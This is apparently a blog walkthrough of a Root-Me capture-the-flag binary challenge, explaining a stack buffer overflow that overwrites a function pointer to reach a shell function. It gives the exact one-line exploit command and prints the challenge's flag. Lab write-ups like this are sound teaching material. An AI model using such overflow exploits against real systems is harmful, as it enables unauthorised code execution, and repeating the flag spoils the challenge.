Back again with another walkthrough from Root-Me Hacking & Information Security Platform. Straight into it. We're provided with the challenge source code as well as the binary protections.
Binary protections NX is enabled, immediately indicating that any code we put onto the stack won't be executed. Reading through, the source code is provided so we can analyze it.
The source code of the challenge gives 3 functions within the binary. The main function, which is the most important function in C programs, shows a integer variable called 'var', a function pointer pointing to the function 'sup' and interestingly, a character buffer of 128 bytes. From that alone, we can see that this challenge will be a classic buffer overflow challenge. the next line introduces the fgets function, which takes in 133 bytes in total from standard input (stdin) and passes it into the buf variable.
executing this binary, will only execute the main function. We see from the source that there is a shell function which gives us a shell (/bin/bash) in order for us to get the flag. The goal will be to use a buffer overflow attack to overwrite the instruction pointer and write the memory address of where the shell function is located, essentially redirecting execution to get a shell.
Note: The memory address of the shell function can be found by loading the binary into GDB and typing 'p shell' to leak the address
I copied the source code and compiled the binary on my local machine but alternatively, Root-Me provides the SSH credentials to access the remote server to connect to and complete the challenge.
To exploit this binary to get a root shell, we can utilize python located on the remote server to write 128 bytes of junk to the binary, plus the address of where the shell function is in memory, we can then pipe the output of that into the binary to exploit the binary. The 'cat' at the end simply a means to prevent any errors once we get a shell and executes any commands.
Exploit Code: (python -c 'print "A"*128 + "\x16\x85\x04\x08"';cat) | ./ch15
Flag: B33r1sSoG00D4y0urBr4iN
No comments:
Post a Comment